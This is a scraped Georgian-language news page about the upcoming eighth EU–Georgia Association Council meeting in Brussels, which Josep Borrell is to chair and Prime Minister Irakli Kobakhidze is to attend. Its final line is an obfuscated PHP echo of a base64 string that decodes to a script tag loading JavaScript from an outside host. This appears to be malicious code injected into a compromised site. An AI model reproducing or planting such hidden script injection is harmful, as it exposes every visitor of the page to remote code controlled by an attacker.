celsiusi
ავერსი შნაიდერი

20 თებერვალს ბრიუსელში საქართველო-ევროკავშირის ასოცირების საბჭოს მერვე სხდომა გაიმართება.

როგორც ევროკავშირის საბჭოს პრესრელიზშია აღნიშნული, სხდომა ბრიუსელის დროით 11:00 საათზე დაიწყება.

სხდომას უხელმძღვანელებს ევროკავშირის საგარეო-პოლიტიკური უწყების ხელმძღვანელი ჯოზეფ ბორელი, ხოლო საქართველოს დელეგაციის ხელმძღვანელი პრემიერ-მინისტრი ირაკლი კობახიძე იქნება.

„შეხვედრა ფოკუსირებული იქნება საქართველოს ევროკავშირთან ასოცირების გზაზე, პოლიტიკურ დიალოგსა და რეფორმებზე, ეკონომიკურ და სექტორულ თანამშრომლობაზე, ვაჭრობასა და მასთან დაკავშირებულ საკითხებზე და კონფლიქტების მშვიდობიან მოგვარებაზე.

დახურულ შეხვედრაზე ევროკავშირისა და საქართველოს წარმომადგენლები გაცვლიან მოსაზრებებს საგარეო და უსაფრთხოების პოლიტიკაზე, კერძოდ, რეგიონულ საკითხებსა და თანამშრომლობაზე უსაფრთხოებისა და თავდაცვის სფეროში“, – აღნიშნულია ევროკავშირის საბჭოს პრესრელიზში.

224
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");